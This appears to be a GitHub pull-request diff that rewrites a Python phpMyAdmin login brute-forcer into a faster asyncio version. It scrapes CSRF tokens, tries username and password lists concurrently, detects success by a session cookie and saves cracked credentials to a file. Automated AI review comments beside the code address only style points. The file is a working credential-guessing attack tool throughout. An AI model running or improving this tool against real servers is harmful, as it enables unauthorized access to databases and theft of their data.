Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
187 changes: 144 additions & 43 deletions main.py
Original file line number Diff line number Diff line change
@@ -1,71 +1,162 @@
#!/usr/bin/env python3
from ast import arg
Copy link

Copilot AI Feb 27, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Unused import 'arg' from 'ast' module. This import appears to be leftover from previous code and is not used anywhere in the file.

Suggested change
from ast import arg

Copilot uses AI. Check for mistakes.
from concurrent.futures import thread
import sys
import requests
import httpx
import html
import re
import os
import argparse
import threading, time
import asyncio
import logging
from datetime import datetime

stop_flag = 0
# Configure logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
handlers=[
logging.StreamHandler()
]
)
logger = logging.getLogger(__name__)

def login(url, username, password):
    """Try one username/password pair against a phpMyAdmin login form (legacy threaded version).

    Fetches the login page to harvest the anti-CSRF fields (set_session / token),
    POSTs the credentials, and on success appends the pair to found.txt and sets
    the module-level stop_flag so the dispatcher can stop spawning workers.

    Args:
        url: phpMyAdmin login page URL.
        username: candidate username.
        password: candidate password.
    """
    # Without this, 'stop_flag = 1' below would only bind a local variable and
    # the dispatcher would never see the stop signal.
    global stop_flag

    # Up to 3 attempts to ride out transient network errors.
    for _ in range(3):
        try:
            res = requests.get(url)
            cookies = dict(res.cookies)
            # Echo back the CSRF fields embedded in the login form.
            data = {
                'set_session': html.unescape(re.search(r"name=\"set_session\" value=\"(.+?)\"", res.text, re.I).group(1)),
                'token': html.unescape(re.search(r"name=\"token\" value=\"(.+?)\"", res.text, re.I).group(1)),
                'pma_username': username,
                'pma_password': password,
            }
            res = requests.post(url, cookies=cookies, data=data)
            cookies = dict(res.cookies)

            # phpMyAdmin only sets pmaAuth-1 after a successful login.  This
            # check was previously commented out, so every completed POST was
            # reported as a hit.
            if 'pmaAuth-1' not in cookies:
                break  # request completed but credentials were rejected
            print("[*] FOUND - %s / %s" % (username, password))
            # Append (not "w") so multiple worker threads don't clobber
            # each other's results; 'with' guarantees the handle is closed.
            with open("found.txt", "a") as f:
                f.write("%s / %s\n" % (username, password))
            stop_flag = 1
            return
        except Exception:
            # Transient failure (connection error, unexpected page); retry.
            pass
    print("[!] FAILED - %s / %s" % (username, password))
# Suppress httpx's per-request INFO logs so they don't drown the progress output.
logging.getLogger("httpx").setLevel(logging.WARNING)

# Set once by whichever task finds valid credentials; all other tasks check it and bail out early.
stop_flag = asyncio.Event()
progress_counter = 0  # attempts completed so far; mutated only under progress_lock
progress_lock = asyncio.Lock()  # serializes progress_counter updates and the progress print
total_tasks = 0  # total user/password combinations; set by bruteforce() before tasks start

def bruteforce(users, passwords, url):
for user in users:
for password in passwords:
async def login(client, url, username, password, semaphore, outfile):
    """Try a single username/password pair against a phpMyAdmin login form.

    Fetches the login page to harvest the anti-CSRF fields (set_session /
    token), then POSTs the credentials.  On success the pair is appended to
    *outfile* and the global stop_flag event is set so other tasks can stop.

    Args:
        client: shared httpx.AsyncClient used for both requests.
        url: phpMyAdmin login page URL.
        username: candidate username.
        password: candidate password.
        semaphore: asyncio.Semaphore bounding concurrent attempts.
        outfile: path that found credentials are appended to.
    """
    global progress_counter

    # Another task already found valid credentials - nothing left to do.
    if stop_flag.is_set():
        return

    async with semaphore:
        # Up to 3 attempts to ride out transient network/HTTP errors.
        for attempt in range(3):
            try:
                res = await client.get(url)
                cookies = dict(res.cookies)

                # The login form embeds anti-CSRF fields we must echo back.
                # Check for None instead of calling .group() blindly, which
                # previously raised AttributeError on unexpected pages and was
                # silently swallowed.
                set_session = re.search(r"name=\"set_session\" value=\"(.+?)\"", res.text, re.I)
                token = re.search(r"name=\"token\" value=\"(.+?)\"", res.text, re.I)
                if set_session is None or token is None:
                    continue  # page didn't look like a phpMyAdmin login form; retry

                data = {
                    'set_session': html.unescape(set_session.group(1)),
                    'token': html.unescape(token.group(1)),
                    'pma_username': username,
                    'pma_password': password,
                }
                res = await client.post(url, cookies=cookies, data=data)
                cookies = dict(res.cookies)

                # phpMyAdmin only sets the pmaAuth-1 cookie after a successful
                # login.  This check was previously commented out, so *every*
                # completed POST was reported as a hit.
                if 'pmaAuth-1' in cookies:
                    logger.info(f"[FOUND] {username} / {password}")
                    # Append (not "w") so concurrent finds don't overwrite
                    # each other's results.
                    with open(outfile, "a") as f:
                        f.write("%s / %s\n" % (username, password))
                    stop_flag.set()
                # The attempt completed (hit or miss) - no retry needed.
                break
            except Exception as e:
                # Transient failure; surface it at debug level instead of the
                # old silent 'pass', then retry.
                logger.debug(f"Attempt {attempt + 1} for {username}/{password} failed: {e}")

    # Count every finished pair (found or not) so the percentage stays accurate.
    async with progress_lock:
        progress_counter += 1
        percentage = (progress_counter / total_tasks) * 100
        print(f"Progress: {percentage:.1f}% ({progress_counter}/{total_tasks})", end='\r')


async def bruteforce(users, passwords, url, max_threads=50, outfile="found.txt"):
global total_tasks, progress_counter

try:
logger.info(f"Starting bruteforce attack on {url}")
logger.info(f"Testing {len(users)} user(s) with {len(passwords)} password(s)")
logger.info(f"Max concurrent threads: {max_threads}")
Copy link

Copilot AI Feb 27, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Misleading terminology: the parameter is named 'max_threads' and the log message says "Max concurrent threads", but async/await uses coroutines, not threads. The correct terminology should be "max concurrent tasks" or "max concurrency" to accurately reflect the async implementation.

Suggested change
logger.info(f"Max concurrent threads: {max_threads}")
logger.info(f"Max concurrent tasks: {max_threads}")

Copilot uses AI. Check for mistakes.
logger.info(f"Output file: {outfile}")

# Calculate estimated time
total_combinations = len(users) * len(passwords)
estimated_time_per_request = 1.0 # seconds (average, including retries)
Copy link

Copilot AI Feb 27, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Magic number 1.0 for estimated_time_per_request is hardcoded without explanation. This estimate is likely inaccurate since the code makes 2 HTTP requests per attempt (GET then POST) and includes retry logic (up to 3 attempts). Consider making this configurable or documenting why this specific value was chosen.

Copilot uses AI. Check for mistakes.
estimated_total_time = (total_combinations / max_threads) * estimated_time_per_request

hours = int(estimated_total_time // 3600)
minutes = int((estimated_total_time % 3600) // 60)
seconds = int(estimated_total_time % 60)

if hours > 0:
time_str = f"{hours}h {minutes}m {seconds}s"
elif minutes > 0:
time_str = f"{minutes}m {seconds}s"
else:
time_str = f"{seconds}s"

logger.info(f"Total combinations: {total_combinations}")
logger.info(f"Estimated time: {time_str}")
logger.info("-" * 50)

total_tasks = total_combinations
progress_counter = 0

# Create semaphore to limit concurrent tasks
semaphore = asyncio.Semaphore(max_threads)

# Use httpx AsyncClient with connection pooling
limits = httpx.Limits(max_connections=max_threads, max_keepalive_connections=max_threads // 2)
async with httpx.AsyncClient(timeout=10.0, limits=limits) as client:
# Process in batches to avoid creating millions of task objects at once
batch_size = max_threads * 2
tasks = []

for user in users:
if stop_flag.is_set():
break
for password in passwords:
if stop_flag.is_set():
break

task = login(client, url, user, password, semaphore, outfile)
tasks.append(task)

# Process batch when it reaches batch_size
if len(tasks) >= batch_size:
await asyncio.gather(*tasks, return_exceptions=True)
tasks = []
if stop_flag.is_set():
break

if stop_flag.is_set():
break

# Process remaining tasks
if tasks and not stop_flag.is_set():
await asyncio.gather(*tasks, return_exceptions=True)

print() # New line after progress bar
logger.info("-" * 50)
if stop_flag.is_set():
logger.info("Credentials found! Stopping bruteforce.")
else:
logger.warning("Bruteforce completed - no valid credentials found")
except Exception as e:
logger.error(f"Error during bruteforce: {str(e)}")
raise


def main():
parser = argparse.ArgumentParser(description='e.g. python3 %s -url http://example.com/pma/ -user root -dict password.txt' % (os.path.basename(__file__)))
parser.add_argument('-url', help='The URL of target website')
parser.add_argument('-user', default='root', help='The username of MySQL (default: root)')
parser.add_argument('-udict', default='none.txt', help='The file path of username dictionary (default: NULL)')
parser.add_argument('-pdict', default='password.txt', help='The file path of password dictionary (default: password.txt)')
parser.add_argument('-max-threads', type=int, default=50, help='Maximum number of concurrent threads (default: 50)')
parser.add_argument('-outfile', default='found.txt', help='The file path to save found credentials (default: found.txt)')

args = parser.parse_args()
url = args.url
pwdDictionary = args.pdict
userDictionary = args.udict
max_threads = args.max_threads
outfile = args.outfile

if url is None:
parser.print_help()
Expand All @@ -76,19 +167,29 @@ def main():
f = open(pwdDictionary, "r")
passwords = re.split("[\r\n]+", f.read())
f.close()
passwords = [p for p in passwords if p] # Remove empty strings
logger.info(f"Loaded {len(passwords)} passwords from '{pwdDictionary}'")
except:
print("[-] Failed to read '%s' file." % (pwdDictionary))
logger.error(f"Failed to read password file: {pwdDictionary}")
return

#Getting users
try:
f = open(userDictionary, "r")
users = re.split("[\r\n]+", f.read())
f.close()
users = [u for u in users if u] # Remove empty strings
logger.info(f"Loaded {len(users)} users from '{userDictionary}'")
except:
users = [args.user]
logger.info(f"Using default user: {args.user}")

bruteforce(users, passwords, url)
bruteforce_task = bruteforce(users, passwords, url, max_threads, outfile)
try:
asyncio.run(bruteforce_task)
except KeyboardInterrupt:
logger.warning("Bruteforce cancelled by user")
sys.exit(0)


if __name__ == '__main__':
Expand Down